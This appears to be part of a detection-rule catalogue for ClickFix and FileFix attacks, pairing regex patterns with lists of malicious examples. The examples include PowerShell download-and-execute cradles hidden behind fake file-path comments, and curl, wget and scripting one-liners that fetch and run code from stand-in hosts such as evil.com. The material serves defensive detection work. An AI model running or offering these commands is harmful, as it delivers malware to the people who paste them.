[19] Filefix Powershell Comment Path
Detects FileFix technique where PowerShell command is followed by a comment with a fake file path. Makes clipboard content appear as a legitimate file path in File Explorer's address bar.
(?i)(powershell.*#\s*[A-Za-z]:\\.+\.(docx?|xlsx?|pptx?|pdf|zip|exe))
โถ
View malicious examples
Powershell.exe -c ping attacker.example # C:\company\internal\shared\file.docx
powershell -c IWR http://evil.com/p.ps1|IEX # C:\Users\John\Documents\Report.pdf
powershell.exe -ep bypass -c curl http://malware.com/payload.exe -o $env:temp\p.exe # C:\HR\Policy2024.docx
PowerShell -Command "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/s')" # C:\Finance\Q4Report.xlsx
powershell -nop -w hidden -c IEX(IWR evil.com/script) # C:\SharedDrive\Documents\Presentation.pptx
powershell.exe -c Start-BitsTransfer http://attacker.com/mal.exe $env:temp\m.exe # C:\Data\Archive.zip
powershell -enc SQBFAFgA... # C:\Program Files\Company\setup.exe
cmd /c powershell -c wget http://evil.com/payload.ps1 -O %temp%\x.ps1; .\x.ps1 # C:\Admin\Tools\utility.exe
powershell -Command "certutil -urlcache -f http://malware.com/file.exe %temp%\out.exe" # C:\IT\Software\installer.exe
powershell.exe -c (New-Object System.Net.WebClient).DownloadFile('http://evil.com/r','%temp%\r.exe') # C:\Backup\2024\data.zip
[20] Filefix Exe Path Comment
Detects FileFix variant where executable path is followed by spaces and a comment. The exe executes in File Explorer's address bar while the comment is ignored.
(?i)(^([A-Za-z]:|%[A-Za-z_]+%)\\.*\.exe\s{3,}#)
โถ
View malicious examples
%USERPROFILE%\Downloads\payload.exe # This will still execute
C:\Users\Public\malware.exe # Legitimate installer
%TEMP%\setup.exe # Company software
C:\ProgramData\update.exe # System update
%APPDATA%\Roaming\Chrome\chrome_update.exe # Browser update
C:\Windows\Temp\installer.exe # Required installation
%PUBLIC%\Downloads\document_reader.exe # PDF viewer
C:\Users\victim\AppData\Local\Temp\legitimate.exe # Safe file
%LOCALAPPDATA%\Microsoft\Edge\edge_installer.exe # Edge update
C:\Temp\critical_patch.exe # Security patch
%USERPROFILE%\Desktop\important.exe # Important tool
C:\Data\tools\utility.exe # Admin utility
[21] Download Commands
Detects general download commands (curl, wget, IWR) from remote URLs. Requires allowlisting for legitimate use.
(?i)((curl|wget|invoke-webrequest|iwr).*(https?|ftp)://)
โถ
View malicious examples
curl http://evil.com/malware.exe -o malware.exe
wget https://attacker.com/payload.sh
Invoke-WebRequest http://malware.com/backdoor.dll -OutFile backdoor.dll
IWR https://evil.com/dropper.ps1 | IEX
curl -fsSL http://bad.com/script.sh | bash
wget -qO- http://evil.com/exploit.sh | sh
curl http://192.168.1.100/clickfix.exe -o clickfix.exe
Invoke-WebRequest -Uri http://evil.com/ransomware.exe -OutFile C:\Temp\ransomware.exe
wget ftp://attacker.com/trojan.bin -O /tmp/trojan.bin
IWR http://malware.com/implant.dll -Method Get -OutFile implant.dll
curl -s http://evil.com/reverse-shell.sh -o /tmp/rs.sh
wget --no-check-certificate https://evil.com/malware.exe
Invoke-WebRequest https://attacker.com/stage2.ps1 -UseBasicParsing -OutFile stage2.ps1
curl http://evil.com/backdoor.py -o backdoor.py
wget -q http://malware.com/loader.dll
[22] Python Ruby Perl
Detects scripting languages downloading and executing remote scripts. Uncommon in ClickFix attacks (5-10% prevalence). High legitimate usage in development environments requires context to distinguish malicious use.
(?i)((python|ruby|perl).*(urllib|requests|eval|exec|net::http|lwp).*https?://|(curl|wget).*https?://.*\|.*(python|ruby|perl))
โถ
View malicious examples
python -c "import urllib; exec(urllib.urlopen('http://evil.com/p.py').read())"
ruby -e "require 'net/http'; eval(Net::HTTP.get(URI('http://malware.com/s.rb')))"
perl -e "use LWP::Simple; eval(get('http://evil.com/p.pl'))"
python3 -c "import requests; exec(requests.get('https://attacker.com/backdoor.py').text)"
python -c "exec(__import__('urllib').urlopen('http://evil.com/mal.py').read())"
ruby -e "require 'open-uri'; eval(URI.open('http://bad.com/dropper.rb').read)"
perl -MLWP::Simple -e "eval(get('http://evil.com/payload.pl'))"
python3 -c "import urllib.request; exec(urllib.request.urlopen('http://malware.com/clickfix.py').read())"
ruby -ropen-uri -e "eval(URI.open('https://attacker.com/implant.rb').read)"
curl http://evil.com/script.py | python
wget -qO- http://malware.com/payload.rb | ruby
curl -s https://evil.com/backdoor.pl | perl
python2 -c "import urllib2; exec(urllib2.urlopen('http://evil.com/mal.py').read())"
python -c "exec(__import__('requests').get('https://attacker.com/stage2.py').text)"
curl http://evil.com/dropper.py | python3